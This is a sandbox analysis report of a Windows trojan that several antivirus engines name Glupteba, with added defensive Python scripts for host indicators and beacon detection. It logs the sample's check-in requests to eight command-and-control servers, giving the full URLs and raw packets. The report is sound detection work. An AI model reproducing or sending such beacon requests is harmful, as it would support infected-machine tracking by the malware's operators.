Analysis Date: 2015-02-14 09:24:59
MD5: 557b7d170b0dd6343e01de80248e4541
SHA1: 0204f4a6d25073b3508c9dcaefe28754cfdf6e43

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 56953330b2e55776b287fca0d4c4d779  sha1: 6888fd8e2eb7c93b8817b84cad6db86650263800  size: 90112
Section .rdata  md5: e1a0370464fb09da6845fe0d6ce7a72b  sha1: b9abd3e3684523df7cc564f39af3040f855ec339  size: 20480
Section .data   md5: 87d38fc434cda8bf5f49a9cdba886f63  sha1: 158f592ddbe2c25269d0c18c98d0e1abc4216a30  size: 8192
Section .rsrc   md5: aff283b1499d9aec9c6c93583bcd1524  sha1: b61a94e315c42f70cfd923bddc2e49af9a84af7a  size: 4096
Timestamp: 2015-01-30 07:51:10 (compile time from the PE header; attacker-controlled, so treat it as a hint rather than evidence)
Packer: Microsoft Visual C++ v6.0 (this is a compiler signature, not a packer: the scanner matched the MSVC 6 runtime entry stub and found no known packer)
PEhash: cf71b4a56b4f3964b35f25853347383d48ff9801
IMPhash: e045384ace6e985b321c332737d39f64
AV 360 Safe: no_virus
AV Ad-Aware: no_virus
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): no_virus
AV BullGuard: no_virus
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Error Scanning File
AV Emsisoft: no_virus
AV Eset (nod32): Win32/Glupteba.M
AV Fortinet: W32/Glupteba.M!tr
AV Frisk (f-prot): no_virus
AV F-Secure: no_virus
AV Grisoft (avg): Small.GWC
AV Ikarus: Trojan.Win32.Glupteba
AV K7: no_virus
AV Kaspersky: no_virus
AV MalwareBytes: Trojan.Agent
AV Mcafee: RDN/Generic.tfr!eh
AV Microsoft Security Essentials: Trojan:Win32/Carberp.I
AV MicroWorld (escan): no_virus
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Detection summary: 8 of 29 engines flag the sample, 20 report it clean and Dr. Web errored. Three engines agree on the Glupteba family (Eset, Fortinet, Ikarus), Microsoft names it Carberp, and the remaining four verdicts are generic. The family names are the useful output here; the 20 clean verdicts only say that signature coverage lagged at scan time.

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝ 15150124\x00
  (the data written under this look-alike NVIDIA key is the same build number the sample sends as version= and comment= in every beacon below, which makes it a usable host indicator; note it lives in HKCU, so it exists only in the hive of the user the sample ran as)
Creates File: \Device\Afd\Endpoint
  (an AFD endpoint is the kernel object behind a Winsock socket; this entry is the sandbox's view of a socket being opened, not a file written to disk)
Creates Mutex: Global\MD7H82HHF7EH2D73
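The two host-based indicators above (the nvUpdSrv registry marker and the Global\ mutex) can be checked directly on a Windows host. The following is an added example written for this page, not code from the sandbox or from the sample's authors: the collector uses winreg and OpenMutexW and therefore only does real work on Windows, while evaluate() is pure so the matching logic can be exercised anywhere on constructed observations. The indicator values are copied from the report; everything else (function names, the result dictionary layout) is this example's own choice.

```python
"""Added example (not part of the sandbox report): look for the two host-based
indicators recorded above, the registry value under the look-alike NVIDIA key
and the Global\\ mutex, on a Windows host.  The collector uses winreg and
OpenMutexW and only runs on Windows; evaluate() is pure so the logic can be
exercised anywhere with constructed observations."""
import ctypes
import sys

# Indicators copied from the report above
IOC_REG_KEY = r"SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv"   # under HKCU
IOC_REG_VALUE = "value"
IOC_REG_DATA = "15150124"            # same number as version= in the beacon
IOC_MUTEX = r"Global\MD7H82HHF7EH2D73"

SYNCHRONIZE = 0x00100000
ERROR_FILE_NOT_FOUND = 2
ERROR_ACCESS_DENIED = 5


def mutex_present(name):
    """True/False when the mutex could be probed, None when undecidable."""
    if sys.platform != "win32":
        return None
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenMutexW.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_wchar_p]
    k32.OpenMutexW.restype = ctypes.c_void_p
    handle = k32.OpenMutexW(SYNCHRONIZE, 0, name)
    if handle:
        k32.CloseHandle(ctypes.c_void_p(handle))
        return True
    err = ctypes.get_last_error()
    if err == ERROR_ACCESS_DENIED:   # exists, but owned at another integrity level
        return True
    if err == ERROR_FILE_NOT_FOUND:
        return False
    return None


def registry_marker():
    """Data of HKCU\\...\\nvUpdSrv\\value as a string, '' if absent, None off Windows."""
    if sys.platform != "win32":
        return None
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, IOC_REG_KEY) as key:
            data, _kind = winreg.QueryValueEx(key, IOC_REG_VALUE)
    except FileNotFoundError:
        return ""
    return str(data)


def collect():
    """Gather the observations evaluate() needs; fields are None when unknown."""
    return {"platform_supported": sys.platform == "win32",
            "registry_data": registry_marker(),
            "mutex_present": mutex_present(IOC_MUTEX)}


def evaluate(obs):
    """Turn observations into a list of matched indicators (empty = clean)."""
    matched = []
    data = obs.get("registry_data")
    if data:
        if data.rstrip("\x00") == IOC_REG_DATA:
            matched.append("registry: nvUpdSrv build marker 15150124 present")
        else:
            matched.append("registry: nvUpdSrv key present with other data (possibly a newer build)")
    if obs.get("mutex_present"):
        matched.append("mutex: " + IOC_MUTEX + " held by a running process")
    return matched


if __name__ == "__main__":
    observations = collect()
    for line in evaluate(observations) or ["no indicators matched"]:
        print(line)
```

Because the marker is under HKCU, run the check as (or load the hive of) each user on a shared machine; the mutex probe, by contrast, sees the Global\ namespace from any session, and an access-denied result is counted as present since the object must exist for the open to be refused.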

Network Details:

HTTP GET: http://62.210.217.195:49126/stat?uid=100&downlink=1111&uplink=1111&id=00016F3F&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://85.13.132.233:39353/stat?uid=100&downlink=1111&uplink=1111&id=00018306&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://71.245.120.18:39394/stat?uid=100&downlink=1111&uplink=1111&id=0001969D&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://50.56.53.165:34549/stat?uid=100&downlink=1111&uplink=1111&id=0001AA35&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://159.253.129.110:48439/stat?uid=100&downlink=1111&uplink=1111&id=0001BDDC&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://54.238.54.133:31189/stat?uid=100&downlink=1111&uplink=1111&id=0001D174&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://213.238.168.2:33879/stat?uid=100&downlink=1111&uplink=1111&id=0001E50B&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)
HTTP GET: http://217.23.14.191:26195/stat?uid=100&downlink=1111&uplink=1111&id=0001F8A3&statpass=bpass&version=15150124&features=30&guid=7de53c1e-a299-4375-872a-5877c5d1e0b4&comment=15150124&p=0&s=
User-Agent: (none)

All eight requests are identical except for the destination and the id= value: each is a bare HTTP/1.0 request line followed by an empty header block (no Host, no User-Agent), as the Raw Pcap section shows. The guid= value is constant across servers, so it identifies this infection rather than the server being contacted, and the servers listen on arbitrary high ports (26195 to 49126), so port-based filtering will not catch this traffic; match on the request shape instead.
Flows TCP: 192.168.1.1:1031 ➝ 62.210.217.195:49126
Flows TCP: 192.168.1.1:1032 ➝ 85.13.132.233:39353
Flows TCP: 192.168.1.1:1033 ➝ 71.245.120.18:39394
Flows TCP: 192.168.1.1:1034 ➝ 50.56.53.165:34549
Flows TCP: 192.168.1.1:1035 ➝ 159.253.129.110:48439
Flows TCP: 192.168.1.1:1036 ➝ 54.238.54.133:31189
Flows TCP: 192.168.1.1:1037 ➝ 213.238.168.2:33879
Flows TCP: 192.168.1.1:1038 ➝ 217.23.14.191:26195

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 46334626 73746174 70617373   0016F3F&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303138 33303626 73746174 70617373   0018306&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303139 36394426 73746174 70617373   001969D&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303141 41333526 73746174 70617373   001AA35&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303142 44444326 73746174 70617373   001BDDC&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 31373426 73746174 70617373   001D174&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303145 35304226 73746174 70617373   001E50B&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303146 38413326 73746174 70617373   001F8A3&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..
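The hexdumps above are the complete on-the-wire payload of each beacon, so they can be decoded without the pcap itself. The following is an added example written for this page, not code from the sandbox or from the sample: it rebuilds the first request from its hexdump text, parses the request line and query string, scores the request against the traits seen in this report (GET /stat, the fixed eleven-key set, statpass=bpass, an eight-hex-digit id, a header-less HTTP/1.0 request), and computes the differences between the eight id= values listed in the report. Those differences all come out close to 5000, which is consistent with id= being a millisecond uptime counter sampled about five seconds apart as the sample walks its server list; that reading is an inference from the numbers, not something the report states. The hexdump input is the report's own first dump re-typed into the code; REPORT_IDS and BEACON_KEYS are likewise copied from the report.

```python
"""Added example (not part of the sandbox report): turn one of the Raw Pcap
hexdumps above back into bytes, parse the beacon it carries, and score it
against the request shape seen in this report.  The only input is the first
hexdump from the report, re-typed below."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input: the report's first hexdump, copied verbatim
# ("offset (decimal)   four hex words   ascii").
SAMPLE_DUMP = """\
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 46334626 73746174 70617373   0016F3F&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d376465 35336331   =30&guid=7de53c1
0x00000070 (00112)   652d6132 39392d34 3337352d 38373261   e-a299-4375-872a
0x00000080 (00128)   2d353837 37633564 31653062 3426636f   -5877c5d1e0b4&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..
"""

# id= values from the eight beacons, in the order the report lists them
REPORT_IDS = ["00016F3F", "00018306", "0001969D", "0001AA35",
              "0001BDDC", "0001D174", "0001E50B", "0001F8A3"]

# Query keys the sample sends on every beacon
BEACON_KEYS = {"uid", "downlink", "uplink", "id", "statpass", "version",
               "features", "guid", "comment", "p", "s"}

_DUMP_LINE = re.compile(r"^\s*0x[0-9a-fA-F]+\s+\(\d+\)\s+(.*?)\s*$")


def hexdump_to_bytes(dump):
    """Rebuild the packet payload from hexdump text; the ASCII column is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        m = _DUMP_LINE.match(line)
        if not m:
            continue
        # hex words and ASCII column are separated by a run of three spaces
        hex_column = re.split(r"\s{3,}", m.group(1), maxsplit=1)[0]
        out += bytes.fromhex(hex_column)
    return bytes(out)


def parse_request(raw):
    """Split an HTTP request into method, path, version, headers and query dict."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")
    method, target, version = lines[0].decode("ascii", "replace").split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return {"method": method, "path": url.path, "version": version,
            "headers": headers, "query": query}


def beacon_indicators(req):
    """Which traits of the report's beacon does this request share?"""
    hits = []
    q = req["query"]
    if req["method"] == "GET" and req["path"] == "/stat":
        hits.append("GET /stat")
    if BEACON_KEYS <= set(q):
        hits.append("full fixed key set")
    if q.get("statpass") == "bpass":
        hits.append("statpass=bpass")
    if re.fullmatch(r"[0-9A-F]{8}", q.get("id", "")):
        hits.append("8-hex-digit id")
    if req["version"] == "HTTP/1.0" and not req["headers"]:
        hits.append("bare HTTP/1.0 request with no headers")
    return hits


def is_stat_beacon(req):
    """Alert on path plus key set; the other traits are corroboration only."""
    hits = beacon_indicators(req)
    return "GET /stat" in hits and "full fixed key set" in hits


def id_deltas(ids):
    """Differences between consecutive id= values, read as hex integers."""
    values = [int(x, 16) for x in ids]
    return [b - a for a, b in zip(values, values[1:])]


if __name__ == "__main__":
    request = parse_request(hexdump_to_bytes(SAMPLE_DUMP))
    print(request["query"])
    print("beacon:", is_stat_beacon(request), beacon_indicators(request))
    print("id deltas:", id_deltas(REPORT_IDS))
```

The alert condition deliberately rests on the path and the key set rather than on the missing headers or the HTTP/1.0 version: a later build could add a User-Agent without changing its protocol, whereas the parameter names are what the server side parses and are the slowest to change.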


Strings
.
B59x TUfu6H8f S86P
Cambria
CJh92058 r73 v1v
CompanyName
CwT6456 LM18 Sx0XSR Q3rnT7g9
cz61 z94
)D1)
E5H0 xTQ3P487 R6A0Sn
e9UYd7ic7
EM0 K7oq9B ik1u94T3 Xx38P
ERj A1c387 B28WwLIc m4qo4
fm8X O7U IAJoD0 gN56n
G4wGDwkw
gA3W65G A92t5Q1 l84df398
h2q9 U62
i2D6D6h lK31R m0YB3 vk0
insideout
instability
interns
investigate
iotas
IqhaL FGnru U5N
(j$.
jbf8O uZ772385
kerosene
kiosk
klick
KPN36G
licenses
lithe
loads
magnetisation
mailshot
microscope
ministrations
MS Sans Serif
N8J4C Xz7N JH251
nanoseconds
ndl c455si4 dT9205yn Vpzuo
neurotic
nk7nMO7 M078CY8 SC87292O E3E
Norman 
o967Iq t57
obliterates
oner
overgrown
p46t
pertains
phrenology
pierced
pizza
poisonings
preens
prelate
process
procrastinator
propping
Q2sB4mzC V9GS bUH20803
RFY5y0
SIMn fL5 qIW11
tlC9cM3u
UL79nmW a4l xfAF9k bvKq4f
uuDw8 GzV2UhC7 nY4is
Verdana
Vk8 k09
VS_VERSION_INFO
wW2se
y2ZM5
Yo618 Z8Z
Z020E08 X19ph s733X2
':#"/(
?'0=<+',
1	'	?57)4$
)2>"/7<"?($
,'	3N!
6*/! #?&:.
\6QTY0^:s;
7:7	($
'"8./&
829	(/
8	(. -7/"/
89?	(04%7/0
9N<2zM
AbortSystemShutdownA
AbortSystemShutdownW
AccessCheckAndAuditAlarmA
_acmdln
AddAccessDeniedAce
AddPrinterDriverExW
AddPrinterDriverW
_adjust_fdiv
ADVAPI32.dll
BuildCommDCBW
BuildTrusteeWithNameA
CallNamedPipeA
CharUpperA
CheckRadioButton
ChooseFontW
ClearCommBreak
CloseDesktop
CloseEventLog
CloseWindowStation
CoInternetCombineUrl
COMCTL32.dll
comdlg32.dll
ConnectNamedPipe
ContinueDebugEvent
_controlfp
CopyRect
CopyStgMedium
CreateAsyncBindCtx
CreateDesktopA
CreateDialogIndirectParamW
CreateEventA
CreateIcon
CreatePrivateObjectSecurity
CreateStdAccessibleObject
CreateUrlCacheEntryA
CreateUrlCacheEntryW
@.data
data_size_ndr
DdeAccessData
DdeGetLastError
DeleteCriticalSection
DeleteUrlCacheEntry
df.;l#
DG{swt
DialogBoxIndirectParamA
DispatchMessageA
DocumentPropertiesA
\E$EZ|a
EnumCalendarInfoW
EnumDesktopsW
EnumPrinterDataA
EnumPrintProcessorsA
EnumWindowStationsA
euiEhI
_except_handler3
~fAC|;
FatalAppExitW
FindAtomW
FindFirstUrlCacheEntryA
FindMediaTypeClass
FindNextFileA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryW
FlatSB_SetScrollInfo
FlushConsoleInputBuffer
FoldStringA
FtpCreateDirectoryA
FtpFindFirstFileW
FtpPutFileA
FtpRemoveDirectoryW
FtpRenameFileA
GdL9)*m
GetClipboardOwner
GetClipCursor
GetCommMask
GetConsoleOutputCP
GetCurrentThread
GetDefaultCommConfigW
GetDialogBaseUnits
GetDiskFreeSpaceExA
GetExplicitEntriesFromAclW
GetIconInfo
GetLocaleInfoW
__getmainargs
GetModuleHandleA
GetModuleHandleW
GetNamedPipeHandleStateA
GetOldestEventLogRecord
GetOpenFileNameA
GetPrivateProfileStringW
GetProfileIntA
GetRoleTextA
GetSidSubAuthorityCount
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadSelectorEntry
GetUrlCacheEntryInfoExA
GetWindowDC
GlobalDeleteAtom
GlobalWire
GopherGetAttributeA
GrayStringA
hRGNxAdFOp
HttpOpenRequestA
HttpSendRequestExW
I=\6~xN
&ICp#>
ImageList_AddMasked
ImageList_Copy
ImageList_DragEnter
ImageList_EndDrag
ImageList_GetDragImage
ImageList_GetIconSize
IMM32.dll
ImmGetContext
InitiateSystemShutdownW
_initterm
InternetAutodial
InternetCombineUrlA
InternetConnectW
InternetFindNextFileA
InternetFindNextFileW
InternetOpenW
InternetSetDialState
I_RpcBindingCopy
I_RpcClearMutex
I_RpcMapWin32Status
IsCharAlphaW
IsCharUpperW
IsDialogMessageW
+-J1O-
KERNEL32.dll
_!L0.NF
LsaEnumerateTrustedDomainsEx
LsaFreeMemory
LsaQueryDomainInformationPolicy
LsaSetTrustedDomainInformation
MapGenericMask
MesEncodeDynBufferHandleCreate
MesIncrementalHandleReset
MessageBoxW
midiInPrepareHeader
mmioSetInfo
mouse_event
Msi.dll
MSVCRT.dll
NdrByteCountPointerFree
NdrClientInitialize
NdrComplexArrayUnmarshall
NdrConformantArrayBufferSize
NdrConformantArrayMemorySize
NdrConformantStringMarshall
NdrConformantStructUnmarshall
NdrEncapsulatedUnionBufferSize
NdrFixedArrayMarshall
NdrMapCommAndFaultStatus
NdrNonEncapsulatedUnionBufferSize
NdrPointerMarshall
NdrRpcSmClientFree
NdrServerCall2
NdrSimpleTypeUnmarshall
NdrStubCall
NdrVaryingArrayMemorySize
NdrXmitOrRepAsBufferSize
)nfI~U
NotifyWinEvent
O-6;<(H
OLEACC.dll
OpenSCManagerW
ox^5t0
__p__commode
__p__fmode
PFoXp\
p*	'\y
*\~QQG
Q+q@SJZG
$r0v/^h
`.rdata
ReadPrinter
RegConnectRegistryW
RegCreateKeyExA
RegReplaceKeyW
ReportEventW
ResUtilGetDwordProperty
ResUtilGetSzValue
RESUTILS.dll
ResUtilSetMultiSzValue
ResUtilSetPropertyTable
ResUtilStopResourceService
RJPUK!
RpcMgmtEpEltInqNextA
RpcMgmtSetCancelTimeout
RpcMgmtStatsVectorFree
RpcNetworkInqProtseqsA
RpcNetworkIsProtseqValidA
RpcRaiseException
RPCRT4.dll
RpcServerInqDefaultPrincNameW
RpcServerListen
RpcServerUseProtseqEpExW
RpcSmEnableAllocate
RpcSmSetClientAllocFree
RpcSmSetThreadHandle
RpcSsAllocate
RpcSsGetThreadHandle
RpcSsSwapClientAllocFree
RpcStringFreeA
__set_app_type
SetMenuItemInfoA
SetPrinterA
SetSecurityDescriptorGroup
SetServiceObjectSecurity
SetSoftwareUpdateAdvertisementState
SetUrlCacheEntryInfoA
SetUrlCacheEntryInfoW
__setusermatherr
short_from_ndr_temp
ShowCaret
sndPlaySoundA
StartServiceCtrlDispatcherW
SUT|K;+b
!This program cannot be run in DOS mode.
tIxy3C
TIZ"fZ
Up;@h\?
urlmon.dll
USER32.dll
UuidCreateNil
UuidEqual
UuidToStringW
`V4(U?
VerInstallFileA
VerLanguageNameW
VERSION.dll
v-i!:.
WindowFromAccessibleObject
WININET.dll
WINMM.dll
WINSPOOL.DRV
_XcptFilter
%{Xd<F
XLiO)o
xQ>:'g
% 'YN,